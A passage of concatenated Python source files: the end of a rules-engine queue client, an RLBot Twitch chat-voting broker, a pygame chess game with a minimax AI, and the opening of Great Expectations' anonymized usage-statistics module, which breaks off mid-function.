if not 'db' in database:
database['db'] = 0
rules.bind_ruleset(database['port'], database['db'], database['host'], database['password'], self._handle)
def isClosed(self):
return self._handle == 0
def post(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_event(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_event(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def assert_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_assert_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_assert_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def retract_fact(self, message):
if self._handle == 0:
raise Exception('Queue has already been closed')
if 'sid' in message:
rules.queue_retract_fact(self._handle, str(message['sid']), self._ruleset_name, json.dumps(message, ensure_ascii=False))
else:
rules.queue_retract_fact(self._handle, None, self._ruleset_name, json.dumps(message, ensure_ascii=False))
def close(self):
if self._handle != 0:
rules.delete_client(self._handle)
self._handle = 0
|
twitch_broker.py
|
import json
import re
from dataclasses import dataclass, field
from pathlib import Path
from threading import Thread
from typing import List, Dict
from rlbot.agents.base_script import BaseScript
from rlbot.utils.game_state_util import GameState, GameInfoState
from rlbot_action_client import Configuration, ActionApi, ApiClient, ActionChoice
from twitchbroker.action_and_server_id import AvailableActionsAndServerId
from twitchbroker.overlay_data import OverlayData, serialize_for_overlay, generate_menu_id, generate_menu, \
CommandAcknowledgement, VoteTracker
from rlbot_twitch_broker_client.models.chat_line import ChatLine
from rlbot_twitch_broker_server import chat_buffer
from rlbot_twitch_broker_server import client_registry
from rlbot_twitch_broker_server.client_registry import ActionServerData
from rlbot_twitch_broker_server.run import find_usable_port, run_twitch_broker_server
from time import sleep
from twitchio import Message
from twitchio.ext.commands import Bot as TwitchBot
class AvailableActionAggregator:
def __init__(self):
self.action_apis: Dict[str, ActionApi] = {}
def make_action_api(self, client_data: ActionServerData):
bot_action_api_config = Configuration()
bot_action_api_config.host = client_data.base_url
return ActionApi(ApiClient(configuration=bot_action_api_config))
def fetch_all(self) -> List[AvailableActionsAndServerId]:
registry = client_registry.CLIENT_REGISTRY
request_threads = []
combined_actions: List[AvailableActionsAndServerId] = []
try:
for client in list(registry.clients.values()):
if client.base_url not in self.action_apis:
self.action_apis[client.get_key()] = self.make_action_api(client)
action_api = self.action_apis[client.get_key()]
request_threads.append((client.get_key(), action_api.get_actions_currently_available(
async_req=True, _request_timeout=0.2)))
for (client_key, req) in request_threads:
avail_actions_list = req.get()
combined_actions += [AvailableActionsAndServerId(a, client_key) for a in avail_actions_list]
except Exception as e:
print(e)
return combined_actions
def get_action_api(self, action_server_id):
return self.action_apis[action_server_id]
@dataclass
class TwitchAuth:
username: str
oauth: str
channel: str
class TwitchChatAdapter(TwitchBot):
def __init__(self, twitch_auth: TwitchAuth):
super().__init__(nick=twitch_auth.username, irc_token=twitch_auth.oauth, initial_channels=[twitch_auth.channel], prefix='!rlb')
async def event_message(self, message: Message):
chat_buffer.CHAT_BUFFER.enqueue_chat(ChatLine(username=message.author.display_name, message=message.content))
@dataclass
class MutableBrokerSettings:
num_old_menus_to_honor: int = 0
pause_on_menu: bool = False
play_time_between_pauses: int = 5
votes_needed: Dict[str, int] = field(default_factory=dict)
class TwitchBroker(BaseScript):
def __init__(self, overlay_folder: Path, twitch_auth: TwitchAuth, broker_settings: MutableBrokerSettings):
super().__init__('TwitchBroker')
self.json_file = overlay_folder / 'twitch_broker_overlay.json'
self.chat_buffer = chat_buffer.CHAT_BUFFER
self.menu_id = None
self.twitch_chat_adapter = None
self.broker_settings = broker_settings
self.vote_trackers: Dict[str, VoteTracker] = {}
self.recent_menus: List[OverlayData] = []
self.needs_new_menu = True
self.aggregator = AvailableActionAggregator()
self.recent_commands: List[CommandAcknowledgement] = []
self.stop_list = set()
self.command_count = 0
self.next_menu_moment: float = 0
if twitch_auth:
self.twitch_chat_adapter = TwitchChatAdapter(twitch_auth)
twitch_thread = Thread(target=self.twitch_chat_adapter.run)
twitch_thread.setDaemon(True)
twitch_thread.start()
def write_json_for_overlay(self, overlay_data: OverlayData):
json_string = json.dumps(overlay_data, default=serialize_for_overlay)
self.json_file.write_text(json_string)
def run_loop_with_chat_buffer(self, desired_port: int):
port = find_usable_port(desired_port)
broker_server_thread = Thread(target=run_twitch_broker_server, args=(port,))
broker_server_thread.setDaemon(True)
broker_server_thread.start()
client_registry.CLIENT_REGISTRY = client_registry.ActionServerRegistry()
while True:
self.get_game_tick_packet()
self.ensure_action_menu()
self.process_chat()
# self.make_passive_overlay_updates()
sleep(.1)
def ensure_action_menu(self):
if not self.needs_new_menu:
return
if not self.game_tick_packet.game_info.is_round_active:
if self.broker_settings.pause_on_menu:
# This seems like overkill, but we keep getting in annoying situations during replays.
self.set_game_state(GameState(game_info=GameInfoState(game_speed=1)))
return
if self.game_tick_packet.game_info.seconds_elapsed < self.next_menu_moment:
return
all_actions = self.aggregator.fetch_all()
self.menu_id = generate_menu_id()
overlay_data = generate_menu(all_actions, self.menu_id, self.recent_commands, self.game_tick_packet,
self.vote_trackers)
if overlay_data.num_actions() == 0:
return
if self.broker_settings.pause_on_menu:
self.set_game_state(GameState(game_info=GameInfoState(game_speed=0.01)))
self.write_json_for_overlay(overlay_data)
# TODO: consider notifying twitch chat of the new prefix via bot in twitch chat for reduced round trip latency
# TODO: also look into twitch extensions: https://dev.twitch.tv/extensions
self.recent_menus.insert(0, overlay_data)
if len(self.recent_menus) > self.broker_settings.num_old_menus_to_honor + 1:
killed_menu = self.recent_menus.pop()
expired_vote_tracker_keys = [key for key, tracker in self.vote_trackers.items() if tracker.original_menu_id == killed_menu.menu_id]
for expired_vt_key in expired_vote_tracker_keys:
self.vote_trackers.pop(expired_vt_key)
self.needs_new_menu = False
def process_chat(self):
if not self.game_tick_packet.game_info.is_round_active:
self.vote_trackers.clear()
return
if not self.chat_buffer.has_chat():
return
chat_line = self.chat_buffer.dequeue_chat()
text = chat_line.message
for menu_index, menu in enumerate(self.recent_menus):
match = re.search(menu.menu_id + '([0-9]+)', text, re.IGNORECASE)
if match is None:
continue
stop_string = f'{match.group(0)}{chat_line.username}'
if stop_string not in self.stop_list:
choice_num = int(match.group(1))
choice = menu.retrieve_choice(choice_num)
if not choice:
print(f"Invalid choice number {choice_num}")
continue
votes_needed_key = choice.entity_name.lower()
if votes_needed_key in self.broker_settings.votes_needed:
votes_needed = self.broker_settings.votes_needed[votes_needed_key]
if votes_needed > 1:
if choice.bot_action.description not in self.vote_trackers:
self.vote_trackers[choice.bot_action.description] = VoteTracker(votes_needed, menu.menu_id, [])
vote_tracker = self.vote_trackers[choice.bot_action.description]
vote_tracker.register_vote(chat_line.username)
self.write_json_for_overlay(self.recent_menus[0])
if not vote_tracker.has_needed_votes():
continue
# Vote successful! Clear out the vote tracker.
self.vote_trackers.pop(choice.bot_action.description)
action_api = self.aggregator.get_action_api(choice.action_server_id)
self.command_count += 1
try:
result = action_api.choose_action(
ActionChoice(action=choice.bot_action, entity_name=choice.entity_name))
status = "success" if result.code == 200 else "error"
description = choice.bot_action.description if result.code == 200 else result.reason
self.recent_commands.append(
CommandAcknowledgement(chat_line.username, description, status, str(self.command_count)))
if result.code == 200:
self.stop_list.add(stop_string)
except Exception as e:
self.recent_commands.append(
CommandAcknowledgement(chat_line.username, str(e), "error", str(self.command_count)))
print(e)
if len(self.recent_commands) > 10:
self.recent_commands.pop(0) # Get rid of the oldest command
# This causes the new command acknowledgement to get published. The overlay_data has an
# internal reference to recent_commands.
self.write_json_for_overlay(self.recent_menus[0])
if menu_index == 0:
self.needs_new_menu = True
if self.broker_settings.pause_on_menu:
self.set_game_state(GameState(game_info=GameInfoState(game_speed=1)))
self.next_menu_moment = self.game_tick_packet.game_info.seconds_elapsed + self.broker_settings.play_time_between_pauses
break
|
chess.py
|
from math import inf
import pygame_menu
import queue
import sys
import threading
import time
from board import *
from timer import Timer
# Initialize Pygame
pygame.init()
# Fonts
FONT = pygame.font.Font(pygame_menu.font.FONT_OPEN_SANS_BOLD, 18)
BIG_FONT = pygame.font.Font(pygame_menu.font.FONT_OPEN_SANS_BOLD, 26)
# Title and Icon
pygame.display.set_caption("ChessAI")
icon = pygame.image.load(os.path.join('img', 'icon.png'))
pygame.display.set_icon(icon)
class Game:
def __init__(self):
self.p1_name = "Player 1"
self.p2_name = "Minimax"
self.p1_timer = Timer(600, "bot")
self.p2_timer = Timer(600, "top")
self.p1_color = WHITE
self.p2_color = BLACK
self.ai_move = queue.Queue()
self.lock = threading.Lock()
self.board = Board(self.p1_color)
self.board.initialize_pieces()
self.menu_screen()
def reset(self):
"""
Resets board and makes changes to game state to prepare for new game
:return: None
"""
self.p2_name = "Minimax"
self.p1_timer.reset()
self.p2_timer.reset()
self.p1_color = WHITE
self.p2_color = BLACK
self.board = Board(self.p1_color)
self.board.initialize_pieces()
self.ai_move = queue.Queue()
def set_name(self, name):
"""
Sets name of human player
:param name: name of human player (str)
:return: None
"""
self.p1_name = name
def set_color(self, color, value):
"""
Sets color of human player
:param color: color selected by player (str)
:param value: RGB representation of color (tuple)
:return: None
"""
self.board.player = value
self.p1_color = value
if value == WHITE:
self.p2_color = BLACK
self.board.bottomPlayerTurn = False
else:
self.p2_color = WHITE
self.board.bottomPlayerTurn = True
self.board = Board(value)
self.board.initialize_pieces()
def set_ai(self, tup, value):
"""
Updates name of AI to correspond to underlying method of move choice
:param tup: tuple containing color as a string and as an RGB tuple (tuple)
:param value: numerical value representing AI (int)
:return: None
"""
self.p2_name = tup[0]
def menu_screen(self):
"""
Displays menu screen
:return: None
"""
theme = pygame_menu.themes.Theme(title_bar_style=pygame_menu.widgets.MENUBAR_STYLE_NONE,
menubar_close_button=False,
widget_font_color=SMALL_TEXT_COLOR,
background_color=BG_COLOR,
widget_font=pygame_menu.font.FONT_OPEN_SANS_BOLD,
cursor_color=WHITE)
menu = pygame_menu.Menu(height=SCREEN_HEIGHT, width=SCREEN_WIDTH, title="", theme=theme, menu_position=(50, 0))
menu.add_label("ChessAI", align=pygame_menu.locals.ALIGN_CENTER, font_name=pygame_menu.font.FONT_OPEN_SANS_BOLD,
font_color=LARGE_TEXT_COLOR, font_size=90, margin=(0, 50))
menu.add_text_input('Name : ', default=self.p1_name, maxchar=10, onchange=self.set_name)
menu.add_selector('Color : ', [('White', WHITE), ('Black', BLACK)], onchange=self.set_color)
menu.add_selector('AI : ', [('Minimax', 1), ('Random', 2)], onchange=self.set_ai)
menu.add_button('Play', self.game_screen)
menu.add_button('Quit', pygame_menu.events.EXIT)
menu.add_label("", align=pygame_menu.locals.ALIGN_CENTER, font_color=BLACK, font_size=70, margin=(0, 50))
menu.center_content()
# Keeps track of whether menu screen should keep running or stop
running = True
# Menu screen loop
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit()
menu.mainloop(SCREEN)
pygame.display.flip()
def determine_move(self):
"""
Determines move for AI and places move in thread-safe container (Queue)
:return: None
"""
# Determine move based on selected AI
if self.p2_name == "Minimax":
self.ai_move.put(AI.minimax(self.board.copy(), 3, inf, -inf, True, self.p2_color)[0])
else:
self.ai_move.put(AI.random_move(self.board))
# Close thread after move has been found
sys.exit()
def game_screen(self):
"""
Displays game screen
:return: None
"""
# Create clock to keep track of time
clock = pygame.time.Clock()
# Stores time passed since last frame (used to tick player timers)
dt = 0
# Create a thread which will be used to determine AI's move concurrently with rest of game
t = threading.Thread(target=self.determine_move)
# Keeps track of whether or not human player has resigned
p1_resigned = False
# Creates collision box for resign button
resign_button = pygame.Rect(BOARD_X + BOARD_SIZE + 8, BOARD_Y + BOARD_SIZE + 8,
int((TILE_SIZE * 4 + 8) / 2 - 4), 28)
# Game screen loop
while True:
for event in pygame.event.get():
# Pygame window was closed
if event.type == pygame.QUIT:
pygame.quit()
exit()
# Check if any buttons were pressed or pieces were selected
if event.type == pygame.MOUSEBUTTONDOWN:
self.board.select()
mouse_pos = event.pos
self.board.draw()
pygame.display.flip()
# Resign button was pressed
if resign_button.collidepoint(mouse_pos):
p1_resigned = True
# Draw background first (everything else goes on top of it)
SCREEN.fill(BG_COLOR)
# Decrement timer for player of current turn
if self.board.turn == self.p2_color:
self.p2_timer.tick(dt)
else:
self.p1_timer.tick(dt)
# Draw UI elements
self.draw_names()
self.draw_turn_indicator()
self.p1_timer.draw()
self.p2_timer.draw()
self.draw_resign_button()
# Check for endgame state
self.board.checkmate_stalemate()
self.board.insufficient_material()
# GAME OVER: Checkmate, Stalemate, or Insufficient Material
if self.board.gameover:
print("GAME OVER: ", self.board.gameover[0])
if self.board.gameover[0] == "Insufficient Material" or self.board.gameover[0] == "Stalemate":
return self.end_screen(self.board.gameover[0], None)
else:
if self.board.gameover[1] == self.board.player:
return self.end_screen(self.board.gameover[0], self.p1_name)
else:
return self.end_screen(self.board.gameover[0], self.p2_name)
# GAME OVER: Player 1 ran out of time
if self.p1_timer.time <= 0:
print("GAME OVER: Timeout")
return self.end_screen("Timeout", self.p2_name)
# GAME OVER: Player 2 ran out of time
if self.p2_timer.time <= 0:
print("GAME OVER: Timeout")
return self.end_screen("Timeout", self.p1_name)
# GAME OVER: Player 1 has resigned
if p1_resigned:
print("GAME OVER: Resignation")
return self.end_screen("Resignation", self.p2_name)
# Tell AI to determine move if...
# 1 - It is their turn
# 2 - They haven't found a move already
# 3 - The game is not over
# 4 - They aren't currently searching for a move (ensure 'determine_move' thread is not running)
self.lock.acquire()
if self.board.turn == self.p2_color \
and self.ai_move.qsize() == 0 \
and not self.board.gameover \
and not t.is_alive():
# Need to remake thread, since a thread can only be started once
t = threading.Thread(target=self.determine_move)
t.start()
self.lock.release()
# Tell AI to make their move if...
# 1 - It is their turn
# 2 - They found a move
# 3 - The game is not over
if self.board.turn == self.p2_color \
and self.ai_move.qsize() > 0 \
and not self.board.gameover:
move = self.ai_move.get()
self.board.make_move(move[0], move[1])
self.board.next_turn()
# Update time since last frame
dt = clock.tick(30) / 1000
# Draw all components of board
self.board.draw()
# Update display
pygame.display.flip()
# Self-play
# if self.board.turn == self.p1_color:
# move = AI.random_move(self.board)
# self.board.make_move(move[0], move[1])
# self.board.next_turn()
def end_screen(self, condition, winner=None):
"""
Displays end screen
:param condition: string representing win condition that ended the game (str)
:param winner: name of winner if applicable (str)
:return: None
"""
# Create background for end screen
bg = pygame.Rect(int(BOARD_X + TILE_SIZE * 2.5), int(BOARD_Y + TILE_SIZE * 2.5), TILE_SIZE * 3, TILE_SIZE * 2)
# Creates collision boxes for rematch and leave buttons
rematch_button = pygame.Rect(bg.left, bg.bottom - 28, bg.centerx - bg.left - 2, 28)
leave_button = pygame.Rect(bg.centerx + 2, bg.bottom - 28, bg.centerx - bg.left - 2, 28)
# Creates fade transitional effect for end screen
def fade(width, height):
f = pygame.Surface((width, height))
f.fill(BG_COLOR)
for alpha in range(0, 175):
f.set_alpha(alpha)
self.board.draw()
SCREEN.blit(f, (0, 0))
pygame.display.update()
pygame.time.delay(1)
# Controls fade effect
fading = True
# End screen loop
while True:
for event in pygame.event.get():
# Pygame window was closed
if event.type == pygame.QUIT:
pygame.quit()
exit()
# Check if any buttons were pressed
if event.type == pygame.MOUSEBUTTONDOWN:
mouse_pos = event.pos
# Rematch button was pressed
if rematch_button.collidepoint(mouse_pos):
self.reset()
return self.game_screen()
# Leave button was pressed
if leave_button.collidepoint(mouse_pos):
self.reset()
return self.menu_screen()
# Apply fade effect
if fading:
fade(SCREEN_WIDTH, SCREEN_HEIGHT)
fading = False
# Draw UI elements
self.draw_end_message(condition, winner)
# Update display
pygame.display.flip()
# Self-play
# time.sleep(1)
# self.reset()
# return self.game_screen()
def draw_names(self):
"""
Draws names for both players
:return: None
"""
# Draw top name (player 2)
pygame.draw.rect(SCREEN, BG_COLOR_LIGHT, [BOARD_X, BOARD_Y - 36, TILE_SIZE * 2, 28])
p1name = FONT.render(self.p2_name, True, SMALL_TEXT_COLOR)
SCREEN.blit(p1name, (BOARD_X + 4, BOARD_Y - 34))
# Draw bottom name (player 1)
pygame.draw.rect(SCREEN, BG_COLOR_LIGHT, [BOARD_X, BOARD_Y + BOARD_SIZE + 8, TILE_SIZE * 2, 28])
p2name = FONT.render(self.p1_name, True, SMALL_TEXT_COLOR)
SCREEN.blit(p2name, (BOARD_X + 4, BOARD_Y + BOARD_SIZE + 10))
def draw_turn_indicator(self):
"""
Draws turn indicator based on turn of current player in game screen
:return: None
"""
if self.board.turn == self.p1_color:
txt = FONT.render("YOUR TURN", True, LARGE_TEXT_COLOR)
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 3.5 + 8), BOARD_Y + BOARD_SIZE + 10))
else:
txt = FONT.render("AI is thinking...", True, LARGE_TEXT_COLOR)
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 3.5 + 8), BOARD_Y + BOARD_SIZE + 10))
@staticmethod
def draw_resign_button():
"""
Draws resign button in game screen
:return: None
"""
pygame.draw.rect(SCREEN, BG_COLOR_LIGHT, [BOARD_X + BOARD_SIZE + 8, BOARD_Y + BOARD_SIZE + 8,
int((TILE_SIZE * 4 + 8) / 2 - 4), 28])
txt = FONT.render("Resign", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + BOARD_SIZE + 40, BOARD_Y + BOARD_SIZE + 10))
@staticmethod
def draw_end_message(condition, winner):
"""
Draws end message in end screen
:param condition: string representing win condition that ended the game (str)
:param winner: name of winner if applicable (str)
:return: None
"""
# Draw 'Game Over' text
bg = pygame.draw.rect(SCREEN, BG_COLOR_LIGHT,
[int(BOARD_X + TILE_SIZE * 2.5), int(BOARD_Y + TILE_SIZE * 2.5), TILE_SIZE * 3,
TILE_SIZE * 2])
pygame.draw.rect(SCREEN, BLACK,
[int(BOARD_X + TILE_SIZE * 2.5), int(BOARD_Y + TILE_SIZE * 2.5), TILE_SIZE * 3, TILE_SIZE * 2],
1)
txt = BIG_FONT.render("Game Over", True, LARGE_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + TILE_SIZE * 3 - 8, int(BOARD_Y + TILE_SIZE * 2.5 + 4)))
# Draw win condition and winner (if applicable)
if winner:
txt = FONT.render(winner + " won", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + TILE_SIZE * 3, BOARD_Y + TILE_SIZE * 3 + 4))
txt = FONT.render(f"by {condition}", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (BOARD_X + TILE_SIZE * 3, int(BOARD_Y + TILE_SIZE * 3.4)))
else:
txt = FONT.render(f"{condition}", True, SMALL_TEXT_COLOR)
if condition == "Insufficient Material":
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 2.55), int(BOARD_Y + TILE_SIZE * 3.3)))
else:
SCREEN.blit(txt, (int(BOARD_X + TILE_SIZE * 3.2), int(BOARD_Y + TILE_SIZE * 3.3)))
# Draw Rematch button
pygame.draw.rect(SCREEN, BLACK, [bg.left, bg.bottom - 28, bg.centerx - bg.left + 3, 28], 1)
txt = FONT.render("Rematch", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (bg.left + 8, bg.bottom - 28 + 2))
# Draw Leave button
pygame.draw.rect(SCREEN, BLACK, [bg.centerx + 2, bg.bottom - 28, bg.centerx - bg.left - 2, 28], 1)
txt = FONT.render("Leave", True, SMALL_TEXT_COLOR)
SCREEN.blit(txt, (bg.centerx + 20, bg.bottom - 28 + 2))
if __name__ == "__main__":
Game()
|
usage_statistics.py
|
import atexit
import copy
import datetime
import enum
import json
import logging
import platform
import signal
import sys
import threading
import time
from functools import wraps
from queue import Queue
from types import FrameType
from typing import Callable, List, Optional
import jsonschema
import requests
from great_expectations import __version__ as ge_version
from great_expectations.core import ExpectationSuite
from great_expectations.core.usage_statistics.anonymizers.anonymizer import Anonymizer
from great_expectations.core.usage_statistics.anonymizers.types.base import (
CLISuiteInteractiveFlagCombinations,
)
from great_expectations.core.usage_statistics.execution_environment import (
GEExecutionEnvironment,
PackageInfo,
PackageInfoSchema,
)
from great_expectations.core.usage_statistics.schemas import (
anonymized_usage_statistics_record_schema,
)
from great_expectations.core.util import nested_update
from great_expectations.data_context.types.base import CheckpointConfig
from great_expectations.rule_based_profiler.config import RuleBasedProfilerConfig
STOP_SIGNAL = object()
logger = logging.getLogger(__name__)
_anonymizers = {}
class UsageStatsExceptionPrefix(enum.Enum):
EMIT_EXCEPTION = "UsageStatsException"
INVALID_MESSAGE = "UsageStatsInvalidMessage"
class UsageStatisticsHandler:
def __init__(
self,
data_context: "DataContext", # noqa: F821
data_context_id: str,
usage_statistics_url: str,
) -> None:
self._url = usage_statistics_url
self._data_context_id = data_context_id
self._data_context_instance_id = data_context.instance_id
self._data_context = data_context
self._ge_version = ge_version
self._message_queue = Queue()
self._worker = threading.Thread(target=self._requests_worker, daemon=True)
self._worker.start()
self._anonymizer = Anonymizer(data_context_id)
try:
self._sigterm_handler = signal.signal(signal.SIGTERM, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigterm_handler = None
try:
self._sigint_handler = signal.signal(signal.SIGINT, self._teardown)
except ValueError:
# if we are not the main thread, we don't get to ask for signal handling.
self._sigint_handler = None
atexit.register(self._close_worker)
@property
def anonymizer(self) -> Anonymizer:
return self._anonymizer
def _teardown(self, signum: int, frame: Optional[FrameType]) -> None:
self._close_worker()
if signum == signal.SIGTERM and self._sigterm_handler:
self._sigterm_handler(signum, frame)
if signum == signal.SIGINT and self._sigint_handler:
self._sigint_handler(signum, frame)
def _close_worker(self) -> None:
self._message_queue.put(STOP_SIGNAL)
self._worker.join()
def _requests_worker(self) -> None:
session = requests.Session()
while True:
message = self._message_queue.get()
if message == STOP_SIGNAL:
self._message_queue.task_done()
return
try:
res = session.post(self._url, json=message, timeout=2)
logger.debug(
"Posted usage stats: message status " + str(res.status_code)
)
if res.status_code != 201:
logger.debug(
"Server rejected message: ", json.dumps(message, indent=2)
)
except requests.exceptions.Timeout:
logger.debug("Timeout while sending usage stats message.")
except Exception as e:
logger.debug("Unexpected error posting message: " + str(e))
finally:
self._message_queue.task_done()
def build_init_payload(self) -> dict:
"""Adds information that may be available only after full data context construction, but is useful to
calculate only one time (for example, anonymization)."""
expectation_suites: List[ExpectationSuite] = [
self._data_context.get_expectation_suite(expectation_suite_name)
for expectation_suite_name in self._data_context.list_expectation_suite_names()
]
init_payload = {
"platform.system": platform.system(),
"platform.release": platform.release(),
"version_info": str(sys.version_info),
"datasources": self._data_context.project_config_with_variables_substituted.datasources,
"stores": self._data_context.stores,
"validation_operators": self._data_context.validation_operators,
"data_docs_sites": self._data_context.project_config_with_variables_substituted.data_docs_sites,
"expectation_suites": expectation_suites,
"dependencies": self._get_serialized_dependencies(),
}
anonymized_init_payload = self._anonymizer.anonymize_init_payload(
init_payload=init_payload
)
return anonymized_init_payload
def _get_serialized_dependencies(self) -> List[dict]:
"""Get the serialized dependencies from the GEExecutionEnvironment."""
ge_execution_environment: GEExecutionEnvironment = GEExecutionEnvironment()
dependencies: List[PackageInfo] = ge_execution_environment.dependencies
schema: PackageInfoSchema = PackageInfoSchema()
serialized_dependencies: List[dict] = [
schema.dump(package_info) for package_info in dependencies
]
return serialized_dependencies
def build_envelope(self, message: dict) -> dict:
message["version"] = "1.0.0"
message["ge_version"] = self._ge_version
message["data_context_id"] = self._data_context_id
message["data_context_instance_id"] = self._data_context_instance_id
message["event_time"] = (
datetime.datetime.now(datetime.timezone.utc).strftime(
"%Y-%m-%dT%H:%M:%S.%f"
)[:-3]
+ "Z"
)
event_duration_property_name: str = f'{message["event"]}.duration'.replace(
".", "_"
)
if hasattr(self, event_duration_property_name):
delta_t: int = getattr(self, event_duration_property_name)
message["event_duration"] = delta_t
return message
@staticmethod
def validate_message(message: dict, schema: dict) -> bool:
try:
jsonschema.validate(message, schema=schema)
return True
except jsonschema.ValidationError as e:
logger.debug(
f"{UsageStatsExceptionPrefix.INVALID_MESSAGE.value} invalid message: "
+ str(e)
)
return False
def send_usage_message(
self,
event: str,
event_payload: Optional[dict] = None,
success: Optional[bool] = None,
) -> None:
"""send a usage statistics message."""
# noinspection PyBroadException
try:
message: dict = {
"event": event,
"event_payload": event_payload or {},
"success": success,
}
self.emit(message)
except Exception:
pass
def emit(self, message: dict) -> None:
"""
Emit a message.
"""
try:
if message["event"] == "data_context.__init__":
message["event_payload"] = self.build_init_payload()
message = self.build_envelope(message=message)
if not self.validate_message(
message, schema=anonymized_usage_statistics_record_schema
):
return
self._message_queue.put(message)
# noinspection PyBroadException
except Exception as e:
# We *always* tolerate *any* error in usage statistics
log_message: str = (
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}"
)
logger.debug(log_message)
def get_usage_statistics_handler(args_array: list) -> Optional[UsageStatisticsHandler]:
try:
# If the object is usage_statistics-capable, then it will have a usage_statistics_handler
handler = getattr(args_array[0], "_usage_statistics_handler", None)
if handler is not None and not isinstance(handler, UsageStatisticsHandler):
logger.debug("Invalid UsageStatisticsHandler found on object.")
handler = None
except IndexError:
# A wrapped method that is not an object; this would be erroneous usage
logger.debug(
"usage_statistics enabled decorator should only be used on data context methods"
)
handler = None
except AttributeError:
# A wrapped method that is not usage_statistics capable
handler = None
except Exception as e:
# An unknown error -- but we still fail silently
logger.debug(
"Unrecognized error when trying to find usage_statistics_handler: " + str(e)
)
handler = None
return handler
def usage_statistics_enabled_method(
func: Optional[Callable] = None,
event_name: Optional[str] = None,
args_payload_fn: Optional[Callable] = None,
result_payload_fn: Optional[Callable] = None,
) -> Callable:
"""
A decorator for usage statistics which defaults to the less detailed payload schema.
"""
if callable(func):
if event_name is None:
event_name = func.__name__
@wraps(func)
def usage_statistics_wrapped_method(*args, **kwargs):
# if a function like `build_data_docs()` is being called as a `dry_run`
# then we dont want to emit usage_statistics. We just return the function without sending a usage_stats message
if "dry_run" in kwargs and kwargs["dry_run"]:
return func(*args, **kwargs)
# Set event_payload now so it can be updated below
event_payload = {}
message = {"event_payload": event_payload, "event": event_name}
result = None
time_begin: int = int(round(time.time() * 1000))
try:
if args_payload_fn is not None:
nested_update(event_payload, args_payload_fn(*args, **kwargs))
result = func(*args, **kwargs)
message["success"] = True
except Exception:
message["success"] = False
raise
finally:
if not ((result is None) or (result_payload_fn is None)):
nested_update(event_payload, result_payload_fn(result))
time_end: int = int(round(time.time() * 1000))
delta_t: int = time_end - time_begin
handler = get_usage_statistics_handler(list(args))
if handler:
event_duration_property_name: str = (
f"{event_name}.duration".replace(".", "_")
)
setattr(handler, event_duration_property_name, delta_t)
handler.emit(message)
delattr(handler, event_duration_property_name)
return result
return usage_statistics_wrapped_method
else:
# noinspection PyShadowingNames
def usage_statistics_wrapped_method_partial(func):
return usage_statistics_enabled_method(
func,
event_name=event_name,
args_payload_fn=args_payload_fn,
result_payload_fn=result_payload_fn,
)
return usage_statistics_wrapped_method_partial
# noinspection PyUnusedLocal
def run_validation_operator_usage_statistics(
data_context: "DataContext", # noqa: F821
validation_operator_name: str,
assets_to_validate: list,
**kwargs,
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
try:
payload["anonymized_operator_name"] = anonymizer.anonymize(
obj=validation_operator_name
)
except TypeError as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, run_validation_operator_usage_statistics: Unable to create validation_operator_name hash"
)
if data_context._usage_statistics_handler:
# noinspection PyBroadException
try:
anonymizer = data_context._usage_statistics_handler.anonymizer
payload["anonymized_batches"] = [
anonymizer.anonymize(obj=batch) for batch in assets_to_validate
]
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, run_validation_operator_usage_statistics: Unable to create anonymized_batches payload field"
)
return payload
# noinspection SpellCheckingInspection
# noinspection PyUnusedLocal
def save_expectation_suite_usage_statistics(
data_context: "DataContext", # noqa: F821
expectation_suite: ExpectationSuite,
expectation_suite_name: Optional[str] = None,
**kwargs,
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
payload = {}
if expectation_suite_name is None:
if isinstance(expectation_suite, ExpectationSuite):
expectation_suite_name = expectation_suite.expectation_suite_name
elif isinstance(expectation_suite, dict):
expectation_suite_name = expectation_suite.get("expectation_suite_name")
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
obj=expectation_suite_name
)
except Exception as e:
logger.debug(
f"{UsageStatsExceptionPrefix.EMIT_EXCEPTION.value}: {e} type: {type(e)}, save_expectation_suite_usage_statistics: Unable to create anonymized_expectation_suite_name payload field"
)
return payload
def edit_expectation_suite_usage_statistics(
data_context: "DataContext", # noqa: F821
expectation_suite_name: str,
interactive_mode: Optional[CLISuiteInteractiveFlagCombinations] = None,
) -> dict:
try:
data_context_id = data_context.data_context_id
except AttributeError:
data_context_id = None
anonymizer = _anonymizers.get(data_context_id, None)
if anonymizer is None:
anonymizer = Anonymizer(data_context_id)
_anonymizers[data_context_id] = anonymizer
if interactive_mode is None:
payload = {}
else:
payload = copy.deepcopy(interactive_mode.value)
# noinspection PyBroadException
try:
payload["anonymized_expectation_suite_name"] = anonymizer.anonymize(
obj=expectation_suite_name
)
except Exception as e:
logger.debug(
